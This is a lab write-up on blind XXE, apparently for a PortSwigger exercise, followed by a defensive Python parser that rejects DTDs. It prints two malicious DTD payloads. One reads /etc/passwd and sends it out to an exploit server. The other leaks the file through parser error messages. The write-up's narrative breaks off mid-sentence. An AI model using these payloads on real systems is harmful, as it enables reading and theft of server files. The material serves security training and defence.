Since this lab is about blind XXE, I won't be trying the default XXE techniques and will take another road. Like the previous lab, I was given an exploit server to use, and that's going to be very handy. I will take the same steps as in the previous lab: hosting a malicious DTD file on that exploit server that reads the content of the /etc/passwd file and exfiltrates it.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % stacked "<!ENTITY % exfil SYSTEM 'https://exploit-**********.com/?x=%file;'>">
%stacked;
%exfil;
Then I will load that DTD through an external entity that I inject into the POST /product/stock request.
This didn't work, so what I will do instead is try to trigger a parsing error and hope that the error message reveals the data I want to exfiltrate. To do that I will modify my malicious file to be:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///thispathdoesnexist/%file;'>">
%eval;
%error;
As you can see now, when I load my malicious DTD file it will read the content of /etc/passwd and save it in the file entity. It will then try to access a resource under the non-existent location /thispathdoesnexist/, using the content of /etc/passwd as the file name it is looking for. Since that path doesn't exist, the parser errors out and, logically, the error message names the file it couldn't find, which in my case is the content of /etc/passwd. That's how I leaked the data through error messages.
Now, by resending the POST /product/stock request to load the malicious DTD again
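As an added defensive counterpart to this writeup (example code, not the lab's or PortSwigger's), here is how a server-side stock-check handler can shut down both the out-of-band and the error-based variant at once: using Python's standard-library expat parser, it refuses the DOCTYPE before any entity can be declared, so the parameter entity never loads and no error message ever carries file content. The request shape (stockCheck with productId and storeId children), the function names and the sample bodies are assumptions.

```python
import xml.parsers.expat

class DtdRejected(ValueError):
    """Request body carried a DOCTYPE, entity declaration or external reference."""

# Constructed sample bodies; the request shape is an assumption, not taken from the lab.
BENIGN_BODY = b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
DTD_BODY = (b'<!DOCTYPE stockCheck [<!ENTITY % ext SYSTEM "http://attacker.invalid/x.dtd"> %ext;]>'
            b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>")

def parse_stock_request(body: bytes) -> dict:
    """Return {child element: text} for the root's children, or raise DtdRejected.
    Aborting on the DOCTYPE itself means no entity (internal, parameter or
    external) is ever declared, so neither XXE variant on this page can start."""
    parser = xml.parsers.expat.ParserCreate()
    # Never process parameter entities or fetch an external DTD subset.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject(*_):
        raise DtdRejected("DTDs and entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject   # any <!DOCTYPE ...>
    parser.EntityDeclHandler = reject         # belt and braces: any <!ENTITY ...>
    parser.ExternalEntityRefHandler = reject  # any reference to an external entity

    fields, depth, text = {}, 0, []

    def start(name, attrs):
        nonlocal depth
        depth += 1
        text.clear()

    def end(name):
        nonlocal depth
        if depth == 2:  # direct child of the root element
            fields[name] = "".join(text).strip()
        depth -= 1

    parser.StartElementHandler = start
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = end
    parser.Parse(body, True)
    return fields

def is_rejected(body: bytes) -> bool:
    try:
        parse_stock_request(body)
    except DtdRejected:
        return True
    return False
```

The same gate applies to any parser: disallow DTDs entirely and the whole entity-declaration machinery that both payloads on this page rely on is out of reach, with no need to block specific paths or error messages.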